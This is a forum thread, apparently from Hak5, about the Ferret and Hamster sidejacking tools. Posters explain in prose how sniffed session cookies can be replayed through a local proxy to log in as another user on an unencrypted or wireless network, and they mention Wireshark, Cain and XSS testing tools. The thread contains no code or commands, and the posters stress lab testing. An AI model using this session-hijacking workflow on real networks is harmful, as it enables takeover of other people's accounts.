Jump to content

Sidejacking made even easier. A Script kiddies wet dreams in 1 click....


digip
 Share

Recommended Posts

Two tools, which some of you may have heard of already, called Ferret and Hamster, are making their way around the internet. One is a packet sniffer that only looks for cookies and the other is a localhost proxy/pcap analyzer used to hijack user sessions. When combined together these little programs  form a nice little function called Sidejacking. Similar to MITM attacks to take over another users account, only they do not rely on using an arp poison attack to sit between the user and the router. Instead, they use captured packets from the network to reconstruct both regular and session cookies to mask yourself as the targeted user. So easy, any one can figure it out.

This works on both Wifi and any Ethernet LAN you may be on, although switched networks should not be affected since they do not rebroadcast to every device on the lan. If the target is not encrypting their taffic using SSL,TLS, SSH, etc, then any captured web traffic containing cookies can be used to authenticate as the user WITHOUT needing their login name or password or a means to decrypt any hashes. Since ferret is only looking for cookies to authenticate as the user, it cuts down on the amount of traffic needed to be captured by other programs like Wireshark, Ettercap, etc. Dumped pcap files (as hamster.txt) will be small in comparison to the long logs often seen by wireshark and other programs when doing MITM attacks. Filtering the captures for only cookie data using Wireshark works when saving the log to hamster.txt to be used by hamster.exe

Hamster creates a little localhost proxy to view the visited websites of your targets, so all you have to do is click any links they visited through Hamsters browser interface and it passes the cookie back to the web server as if you were them, thus performing the Sidejack and logging you on as them.

I tested it on my own network just to see how simple it was. I have to say, it is scary easy to perform and I can see people recompiling the sources into one tool at some point, taking out all the guess work and need to setup everything. A Script kiddies wet dreams in 1 click....

There is no need for me to post the link to these tools on hak5, as they are easy to find with google.

Link to comment
Share on other sites

Actually, just tried it using https and I was able to still logon due to session cookies being available. So it seems SSL does not thwart the attack as I had thought. I'll test it some more later using my laptops wifi when I get the chance to make sure. I am testing it on my pc only at the moment and this probably isnt the best way to see if SSL will block it. I think I will get the same results though and it will still be able to logon if the server or the user rebroadcasts the session data in the clear.

Link to comment
Share on other sites

This can be done easily with Wireshark and a cookie editor in Firefox. You have been able to do this for many years.

agreed, though its now easier for skiddies. Like only a few clicks easy. Wireshark required knowledge.

If you can read, you can use Wireshark.

Link to comment
Share on other sites

This can be done easily with Wireshark and a cookie editor in Firefox. You have been able to do this for many years.

My post wasn't anything new. Session stealing has been around longer than some of us have even been on the inernet. What was inseresting to me is how automated and easy these attacks are becoming. Pretty soon, XSS attacks will be a one click setup and all you have to do is type in the name of your target. Look at metasploit. Great tool to audit your LAN's Servers and Workstations, but it's also the same tool used by 12 year old kids who know how to read and open a web browser. Doesn't make them any more skilled, just that they know where to put the key in and how to step on the gas.

Yes. Session stealing is nothing new and I totally agree with you on the wireshark comment.

It is just to the point these days that everything is so easy, people walk around calling themselves "haxorz" and never once did anything themself that wasn't automated for them. Every tool used by people to hijack a wireless connection or users sessions was because someone, who was the real hacker, wrote it themself. We just all end up using their tools. I am not saying there isn't skill in learning how to do these things, but kids today do not need to learn about all the details under the hood in order to drive the cars they own. It's is also part of the problem and why there are so many people on here asking how to hack their school. Instead of learning how to do things and in turn educating themself, they end up running their mouths about how "l337" they are when they just discovered some tool that does everything for them. The real elite are the ones who wrote the tools.

I have to admit I have used some of these tools in the past, but not because I want to hack someone or break into something. I am no saint when it comes to computers, but I have no desire to use these for ill intent.  I do however like to learn about these things and see how they work. What picks my brain more is how it does it and learning about that is what has always intrigued me about computers. Its not the tool and what it does, but how it does it that makes me want to learn about it. I could care less about logging onto someones email or myspace page, but what I do want to know is what is the flaw, what is the hole, where is the weakness, how do you exploit it, and how do you defend against it. How does it all work has always been my goal and not "how many peepz can I pwn with my l337 haxor skillz".

Link to comment
Share on other sites

This can be done easily with Wireshark and a cookie editor in Firefox. You have been able to do this for many years.

Pretty soon, XSS attacks will be a one click setup and all you have to do is type in the name of your target.

http://www.securitycompass.com/exploitme.shtml

XSS-Me is the Exploit-Me tool used to test for reflected Cross-Site Scripting (XSS).

SQL Inject Me is the Exploit-Me tool used to test for SQL Injection vulnerabilities.

Link to comment
Share on other sites

if I'm not mistaken you need to be on the same network right?

Well, yes if you want to do a MITM and then use that in combo with ferret and hamster, but no if your wireless card can see all wireless traffic.

Most windows machines I have seen can not do this by default without certain wireless cards or something like AirPCap

(http://www.cacetech.com/products/airpcap_family.htm?utm_source=Wireshark&utm_medium=cpc&utm_term=airpcap&utm_content=airpcap&utm_campaign=Wireshark_Product).

Granted, a MITM attack pretty much will give you everything you want anyway. Using something like Cain + Ferret + Hamster just makes it easier to not have to go through wireshark logs and edit the cookies manually. Cain is usually just going to show you the passwords it finds, but since there are none in the event that they logon using just the cookies or are already logged onto the site Ferret and Hamster make it easy to just click the link of your targeted users and your automatically logged on to the page they are viewing.

Link to comment
Share on other sites

Very interesting, I just wanted to add I dont think its wrong to use things like this in a controlled enviroment, I myself have alot of curiosity so I made a lab to test exploits and vulnerabiltys without harming anyone else.I think this is totally acceptable but soemtimes I feel wrong to have this curiosity or that i will  be ridiculed here for shareing my findings. I say to each his own let indivduals take personal responsibilty for there actions but lets not put down someones actions unless its based on there intent. Trust me I have seen the post here how do i hack my school networks and that is dumb and I am happy that alot of you lead people with that mind state in the right direction.ultimately my point is I think we should allow people to test things here and share them of this nature, for good intent only, yes there will always be somebody that takes advantage, but freedom of information is good.So why not make it work with the switchblade its an idea and a project to explore and invent..

Link to comment
Share on other sites

Very interesting, I just wanted to add I dont think its wrong to use things like this in a controlled enviroment, I myself have alot of curiosity so I made a lab to test exploits and vulnerabiltys without harming anyone else.I think this is totally acceptable but soemtimes I feel wrong to have this curiosity or that i will  be ridiculed here for shareing my findings. I say to each his own let indivduals take personal responsibilty for there actions but lets not put down someones actions unless its based on there intent. Trust me I have seen the post here how do i hack my school networks and that is dumb and I am happy that alot of you lead people with that mind state in the right direction.ultimately my point is I think we should allow people to test things here and share them of this nature, for good intent only, yes there will always be somebody that takes advantage, but freedom of information is good.So why not make it work with the switchblade its an idea and a project to explore and invent..

I have no problem with people using these tools. I just do not want to spoon feed 90% of the script kiddies on the forums, I want them to put in the effort and work to learn something instead of just wanting to pwn everything. As far as pentesting and research, I am all for it, even when its sniffing the neighbors wifi, so long as your not going to try compromising their info or acocunt and its all jsut for the learnign experience.

I myself love reading about tools like this and for me it smore about the knowledge gained from learning the tools than it is about what I can do with them. If your up for some good reading that really picks my brain and keeps me busy, go through the Sans Daily Diary and its archives. Lots of good info to read through and a good place to learn about things like this. They also often have tools listed you can use in defending attacks and what not and for pentrsting your own networks.

http://isc.sans.org/diaryarchive.html

(Be sure you set up a dedicated box that is isolated from the rest of yoru network and one that your using just for testing when connecting to some of the sites they list as they will often give you links to sites with live virii and spyware as well as different attacks to gain root of a machine just by visiting the site!)

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...